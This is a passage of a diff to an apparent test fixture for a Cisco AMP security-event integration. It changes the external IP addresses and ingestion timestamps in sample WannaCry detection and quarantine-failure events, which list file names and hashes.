Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419303565650558987\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225558,\"description\":\"Delete pending\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", "code": "2164260880", "kind": "alert", "action": "Quarantine Failure", @@ -1799,7 +1799,7 @@ } ], "connector_guid": "test_connector_guid", - "external_ip": "8.8.8.8" + "external_ip": "81.2.69.144" }, "file": { "disposition": "Malicious", @@ -1844,7 +1844,7 @@ "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" ], "ip": [ - "8.8.8.8", + "81.2.69.144", "10.10.10.10" ] }, 
@@ -1854,8 +1854,8 @@ }, "event": { "severity": 2, - "ingested": "2021-09-30T00:14:44.025256572Z", - "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419303574240494000,\"timestamp\":1610652551,\"timestamp_nanoseconds\":664000000,\"date\":\"2021-01-14T19:29:11+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419303565650558986\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225558,\"description\":\"Delete pending\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", + "ingested": "2021-12-09T13:35:39.763897100Z", + "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419303574240494000,\"timestamp\":1610652551,\"timestamp_nanoseconds\":664000000,\"date\":\"2021-01-14T19:29:11+00:00\",\"event_type\":\"Quarantine 
Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419303565650558986\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225558,\"description\":\"Delete pending\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", "code": "2164260880", "kind": "alert", "action": "Quarantine Failure", @@ -1875,7 +1875,7 @@ } ], "connector_guid": "test_connector_guid", - "external_ip": "8.8.8.8" + "external_ip": "81.2.69.144" }, "file": { "disposition": "Malicious", @@ -1920,7 +1920,7 @@ "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" ], "ip": [ - "8.8.8.8", + "81.2.69.144", "10.10.10.10" ] }, 
@@ -1930,8 +1930,8 @@ }, "event": { "severity": 2, - "ingested": "2021-09-30T00:14:44.025258876Z", - "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419303574240494000,\"timestamp\":1610652551,\"timestamp_nanoseconds\":664000000,\"date\":\"2021-01-14T19:29:11+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419303565650558985\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225524,\"description\":\"Object name not found\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", + "ingested": "2021-12-09T13:35:39.763903200Z", + "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419303574240494000,\"timestamp\":1610652551,\"timestamp_nanoseconds\":664000000,\"date\":\"2021-01-14T19:29:11+00:00\",\"event_type\":\"Quarantine 
Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419303565650558985\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225524,\"description\":\"Object name not found\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", "code": "2164260880", "kind": "alert", "action": "Quarantine Failure", @@ -1951,7 +1951,7 @@ } ], "connector_guid": "test_connector_guid", - "external_ip": "8.8.8.8" + "external_ip": "81.2.69.144" }, "file": { "disposition": "Malicious", @@ -1996,7 +1996,7 @@ "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" ], "ip": [ - "8.8.8.8", + "81.2.69.144", "10.10.10.10" ] }, 
@@ -2006,8 +2006,8 @@ }, "event": { "severity": 2, - "ingested": "2021-09-30T00:14:44.025261148Z", - "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419303574240494000,\"timestamp\":1610652551,\"timestamp_nanoseconds\":664000000,\"date\":\"2021-01-14T19:29:11+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419303565650558984\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225558,\"description\":\"Delete pending\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", + "ingested": "2021-12-09T13:35:39.763909300Z", + "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419303574240494000,\"timestamp\":1610652551,\"timestamp_nanoseconds\":664000000,\"date\":\"2021-01-14T19:29:11+00:00\",\"event_type\":\"Quarantine 
Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419303565650558984\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225558,\"description\":\"Delete pending\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", "code": "2164260880", "kind": "alert", "action": "Quarantine Failure", @@ -2027,7 +2027,7 @@ } ], "connector_guid": "test_connector_guid", - "external_ip": "8.8.8.8" + "external_ip": "81.2.69.144" }, "file": { "disposition": "Malicious", @@ -2084,7 +2084,7 @@ "2ca2d550e603d74dedda03156023135b38da3630cb014e3d00b1263358c5f00d" ], "ip": [ - "8.8.8.8", + "81.2.69.144", "10.10.10.10" ] }, 
@@ -2101,8 +2101,8 @@ }, "event": { "severity": 2, - "ingested": "2021-09-30T00:14:44.025263398Z", - "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419303574240494000,\"timestamp\":1610652551,\"timestamp_nanoseconds\":461000000,\"date\":\"2021-01-14T19:29:11+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.2CA2D550E6-100.SBX.VIOC\",\"detection_id\":\"6419303574240493599\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"taskse.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ProgramData\\\\qzkbplcgew884\\\\taskse.exe\",\"identity\":{\"sha256\":\"2ca2d550e603d74dedda03156023135b38da3630cb014e3d00b1263358c5f00d\"},\"parent\":{\"process_id\":2920,\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}}", + "ingested": "2021-12-09T13:35:39.763919Z", + "original": 
"{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419303574240494000,\"timestamp\":1610652551,\"timestamp_nanoseconds\":461000000,\"date\":\"2021-01-14T19:29:11+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.2CA2D550E6-100.SBX.VIOC\",\"detection_id\":\"6419303574240493599\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"taskse.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ProgramData\\\\qzkbplcgew884\\\\taskse.exe\",\"identity\":{\"sha256\":\"2ca2d550e603d74dedda03156023135b38da3630cb014e3d00b1263358c5f00d\"},\"parent\":{\"process_id\":2920,\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}}", "code": "1090519054", "kind": "alert", "action": "Threat Detected", @@ -2124,7 +2124,7 @@ } ], "connector_guid": "test_connector_guid", - "external_ip": "8.8.8.8" + "external_ip": "81.2.69.144" }, "file": { "parent": { @@ -2181,7 +2181,7 @@ "4a468603fdcb7a2eb5770705898cf9ef37aade532a7964642ecd705a74794b79" ], "ip": [ - "8.8.8.8", + "81.2.69.144", "10.10.10.10" ] }, 
@@ -2198,8 +2198,8 @@ }, "event": { "severity": 2, - "ingested": "2021-09-30T00:14:44.025265613Z", - "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419303574240494000,\"timestamp\":1610652551,\"timestamp_nanoseconds\":430000000,\"date\":\"2021-01-14T19:29:11+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.4A468603FD.04426d77.auto.Talos\",\"detection_id\":\"6419303574240493597\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"taskdl.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ProgramData\\\\qzkbplcgew884\\\\taskdl.exe\",\"identity\":{\"sha256\":\"4a468603fdcb7a2eb5770705898cf9ef37aade532a7964642ecd705a74794b79\"},\"parent\":{\"process_id\":2920,\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}}", + "ingested": "2021-12-09T13:35:39.763924600Z", + "original": 
"{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419303574240494000,\"timestamp\":1610652551,\"timestamp_nanoseconds\":430000000,\"date\":\"2021-01-14T19:29:11+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.4A468603FD.04426d77.auto.Talos\",\"detection_id\":\"6419303574240493597\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"taskdl.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ProgramData\\\\qzkbplcgew884\\\\taskdl.exe\",\"identity\":{\"sha256\":\"4a468603fdcb7a2eb5770705898cf9ef37aade532a7964642ecd705a74794b79\"},\"parent\":{\"process_id\":2920,\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}}", "code": "1090519054", "kind": "alert", "action": "Threat Detected", @@ -2221,7 +2221,7 @@ } ], "connector_guid": "test_connector_guid", - "external_ip": "8.8.8.8" + "external_ip": "81.2.69.144" }, "file": { "parent": { @@ -2282,7 +2282,7 @@ "45356a9dd616ed7161a3b9192e2f318d0ab5ad10" ], "ip": [ - "8.8.8.8", + "81.2.69.144", "10.10.10.10" ] }, 
@@ -2299,8 +2299,8 @@ }, "event": { "severity": 2, - "ingested": "2021-09-30T00:14:44.025267991Z", - "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419303574240494000,\"timestamp\":1610652551,\"timestamp_nanoseconds\":327000000,\"date\":\"2021-01-14T19:29:11+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.Ransom:Gen.20gl.1201\",\"detection_id\":\"6419303574240493595\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"u.wnry\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ProgramData\\\\qzkbplcgew884\\\\u.wnry\",\"identity\":{\"sha256\":\"b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25\",\"sha1\":\"45356a9dd616ed7161a3b9192e2f318d0ab5ad10\",\"md5\":\"7bf2b57f2a205768755c07f238fb32cc\"},\"parent\":{\"process_id\":2920,\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}}", + "ingested": "2021-12-09T13:35:39.763931100Z", + "original": 
"{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419303574240494000,\"timestamp\":1610652551,\"timestamp_nanoseconds\":327000000,\"date\":\"2021-01-14T19:29:11+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.Ransom:Gen.20gl.1201\",\"detection_id\":\"6419303574240493595\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"u.wnry\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ProgramData\\\\qzkbplcgew884\\\\u.wnry\",\"identity\":{\"sha256\":\"b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25\",\"sha1\":\"45356a9dd616ed7161a3b9192e2f318d0ab5ad10\",\"md5\":\"7bf2b57f2a205768755c07f238fb32cc\"},\"parent\":{\"process_id\":2920,\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}}", "code": "1090519054", "kind": "alert", "action": "Threat Detected", @@ -2322,7 +2322,7 @@ } ], "connector_guid": "test_connector_guid", - "external_ip": "8.8.8.8" + "external_ip": "81.2.69.144" }, "file": { "parent": { 
@@ -2383,7 +2383,7 @@ "45356a9dd616ed7161a3b9192e2f318d0ab5ad10" ], "ip": [ - "8.8.8.8", + "81.2.69.144", "10.10.10.10" ] }, 
@@ -2400,8 +2400,8 @@ }, "event": { "severity": 2, - "ingested": "2021-09-30T00:14:44.025270272Z", - "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419303574240494000,\"timestamp\":1610652551,\"timestamp_nanoseconds\":313000000,\"date\":\"2021-01-14T19:29:11+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.Ransom:Gen.20gl.1201\",\"detection_id\":\"6419303574240493594\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"@WanaDecryptor@.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ProgramData\\\\qzkbplcgew884\\\\@WanaDecryptor@.exe\",\"identity\":{\"sha256\":\"b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25\",\"sha1\":\"45356a9dd616ed7161a3b9192e2f318d0ab5ad10\",\"md5\":\"7bf2b57f2a205768755c07f238fb32cc\"},\"parent\":{\"process_id\":2920,\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}}", + "ingested": "2021-12-09T13:35:39.763937100Z", + "original": 
"{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419303574240494000,\"timestamp\":1610652551,\"timestamp_nanoseconds\":313000000,\"date\":\"2021-01-14T19:29:11+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.Ransom:Gen.20gl.1201\",\"detection_id\":\"6419303574240493594\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"@WanaDecryptor@.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ProgramData\\\\qzkbplcgew884\\\\@WanaDecryptor@.exe\",\"identity\":{\"sha256\":\"b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25\",\"sha1\":\"45356a9dd616ed7161a3b9192e2f318d0ab5ad10\",\"md5\":\"7bf2b57f2a205768755c07f238fb32cc\"},\"parent\":{\"process_id\":2920,\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}}", "code": "1090519054", "kind": "alert", "action": "Threat Detected", @@ -2423,7 +2423,7 @@ } ], "connector_guid": "test_connector_guid", - "external_ip": "8.8.8.8" + "external_ip": "81.2.69.144" }, "file": { "parent": { 
@@ -2468,7 +2468,7 @@ "b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25" ], "ip": [ - "8.8.8.8", + "81.2.69.144", "10.10.10.10" ] }, 
@@ -2478,8 +2478,8 @@
 },
 "event": {
 "severity": 2,
- "ingested": "2021-09-30T00:14:44.025272669Z",
